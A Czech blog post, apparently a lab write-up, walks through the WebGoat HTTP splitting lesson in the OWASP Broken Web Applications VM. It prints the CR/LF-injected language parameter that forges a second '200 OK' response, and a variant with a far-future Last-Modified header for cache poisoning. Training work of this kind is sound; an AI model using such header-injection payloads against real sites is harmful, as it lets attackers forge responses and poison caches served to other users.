OWASP broken webapp project – HTTP splitting

Tak jsem si rozchodil OWASP broken web applications project, což je virtualizovaná apliance/web server s různými webovými aplikacemi od OWASPu.

Některé z nich jsem už kdysi absolvoval, ale zjistil jsem, že si z nich moc nepamatuju, respektive že mám ánung, co dělat, co sledovat, ale není důvod, proč tím neprojít znovu.

Začal jsem WebGoat projektem.

První úkol je HTTP splitting.

Aplikace vyzvala k vložení parametru jazyka. Při vložení \n\r dojde k chybě aplikace, což znamená, že parametr je ovlivnitelný (což je odhadnutelný z popisu).

Cílem, dle popisu:

This lesson has two stages. Stage 1 teaches you how to do HTTP Splitting attacks while stage 2 builds on that to teach you how to elevate HTTP Splitting to Cache Poisoning.

Enter a language for the system to search by. You will notice that the application is redirecting your request to another resource on the server. You should be able to use the CR (%0d) and LF (%0a) characters to exploit the attack. Your goal should be to force the server to send a 200 OK. If the screen changed as an effect to your attack, just go back to the homepage. After stage 2 is exploited successfully, you will find the green check in the left menu.

Takže donutit aplikaci k vrácení 200 OK.

Vše je procesovaný skrze GET, takže jsem do toho po URI zakódování poslal HTTP request:

en
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 18
<html>split</html>

en <- jazyk pro vyhledávání (očekávaný vstup)
Content-Length: 0 <- délka packetu
HTTP/1.1 200 OK <- odpověď serveru
Content-Type: text/html <- co za zprávu posílám
Content-Length: 18 <- délka zprávy/packetu
<html>split</html> <- zpráva

Čímž byla první část splněna. Pro cachování zprávy je třeba přidat expiraci.

 

en
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 30 Apr 2099 00:00:00 GMT
Content-Length: 18
<html>split</html>

A splněno.

 

Advertisements

Zanechat Odpověď

Vyplňte detaily níže nebo klikněte na ikonu pro přihlášení:

WordPress.com Logo

Komentujete pomocí vašeho WordPress.com účtu. Odhlásit / Změnit )

Twitter picture

Komentujete pomocí vašeho Twitter účtu. Odhlásit / Změnit )

Facebook photo

Komentujete pomocí vašeho Facebook účtu. Odhlásit / Změnit )

Google+ photo

Komentujete pomocí vašeho Google+ účtu. Odhlásit / Změnit )

Připojování k %s